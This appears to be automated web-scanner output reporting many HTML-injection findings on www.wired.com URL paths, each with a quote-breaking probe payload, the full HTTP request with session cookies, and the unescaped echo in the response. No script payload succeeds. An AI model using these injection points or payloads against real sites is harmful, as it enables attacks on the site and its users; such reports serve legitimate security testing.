The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ef3"><a>57259787c53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue20ef3"><a>57259787c53/17-04 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=235 Expires: Mon, 22 Nov 2010 01:06:27 GMT Date: Mon, 22 Nov 2010 01:02:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue20ef3"><a>57259787c53 c_17-04"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cdd1"><a>9f7ac2fc7e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-045cdd1"><a>9f7ac2fc7e2 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:07:00 GMT Date: Mon, 22 Nov 2010 01:03:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-045cdd1"><a>9f7ac2fc7e2"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83f4a"><a>96ed1f40f40 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue83f4a"><a>96ed1f40f40/17-05 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=230 Expires: Mon, 22 Nov 2010 01:05:58 GMT Date: Mon, 22 Nov 2010 01:02:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue83f4a"><a>96ed1f40f40 c_17-05"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef828"><a>381362cea6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-05ef828"><a>381362cea6d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:06:57 GMT Date: Mon, 22 Nov 2010 01:03:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-05ef828"><a>381362cea6d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload accf4"><a>f11fb1bdd52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issueaccf4"><a>f11fb1bdd52/17-06 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:05:53 GMT Date: Mon, 22 Nov 2010 01:01:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issueaccf4"><a>f11fb1bdd52 c_17-06"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2bc0"><a>3f86a5f38af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-06d2bc0"><a>3f86a5f38af HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Mon, 22 Nov 2010 01:06:28 GMT Date: Mon, 22 Nov 2010 01:02:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-06d2bc0"><a>3f86a5f38af"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79712"><a>eb8ee9010ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue79712"><a>eb8ee9010ab/17-07 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=236 Expires: Mon, 22 Nov 2010 01:06:12 GMT Date: Mon, 22 Nov 2010 01:02:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue79712"><a>eb8ee9010ab c_17-07"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fee2"><a>91dd18ca45c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-074fee2"><a>91dd18ca45c HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:07:08 GMT Date: Mon, 22 Nov 2010 01:03:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-074fee2"><a>91dd18ca45c"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d807e"><a>d5632562e89 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issued807e"><a>d5632562e89/17-08 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:05:40 GMT Date: Mon, 22 Nov 2010 01:01:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issued807e"><a>d5632562e89 c_17-08"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4df0"><a>0915993bba4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-08c4df0"><a>0915993bba4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Mon, 22 Nov 2010 01:06:32 GMT Date: Mon, 22 Nov 2010 01:02:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-08c4df0"><a>0915993bba4"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f377"><a>a70e93eb2b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue2f377"><a>a70e93eb2b8/17-09 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Mon, 22 Nov 2010 01:05:19 GMT Date: Mon, 22 Nov 2010 01:01:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue2f377"><a>a70e93eb2b8 c_17-09"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4579"><a>26cfdf967a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-09f4579"><a>26cfdf967a3 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=238 Expires: Mon, 22 Nov 2010 01:06:33 GMT Date: Mon, 22 Nov 2010 01:02:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-09f4579"><a>26cfdf967a3"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96633"><a>d97168b35a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue96633"><a>d97168b35a3/17-10 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=221 Expires: Mon, 22 Nov 2010 01:05:30 GMT Date: Mon, 22 Nov 2010 01:01:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue96633"><a>d97168b35a3 c_17-10"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84a3a"><a>b28e513b893 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/17-1084a3a"><a>b28e513b893 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:06:51 GMT Date: Mon, 22 Nov 2010 01:02:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_17-1084a3a"><a>b28e513b893"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4172"><a>ef04e99490a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issued4172"><a>ef04e99490a/geekipedia HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:05:46 GMT Date: Mon, 22 Nov 2010 01:01:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issued4172"><a>ef04e99490a c_geekipedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88d75"><a>742ed78951f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/geekipedia88d75"><a>742ed78951f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29362 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:06:56 GMT Date: Mon, 22 Nov 2010 01:02:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_geekipedia88d75"><a>742ed78951f"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a220"><a>e0ebb2c7f4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue8a220"><a>e0ebb2c7f4b/test2007/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29359 Vary: Accept-Encoding Cache-Control: max-age=218 Expires: Mon, 22 Nov 2010 01:08:46 GMT Date: Mon, 22 Nov 2010 01:05:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue8a220"><a>e0ebb2c7f4b c_test2007"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0cd5"><a>ead6bfc60a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/test2007c0cd5"><a>ead6bfc60a1/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29359 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:52 GMT Date: Mon, 22 Nov 2010 01:05:52 GMT Connection: close
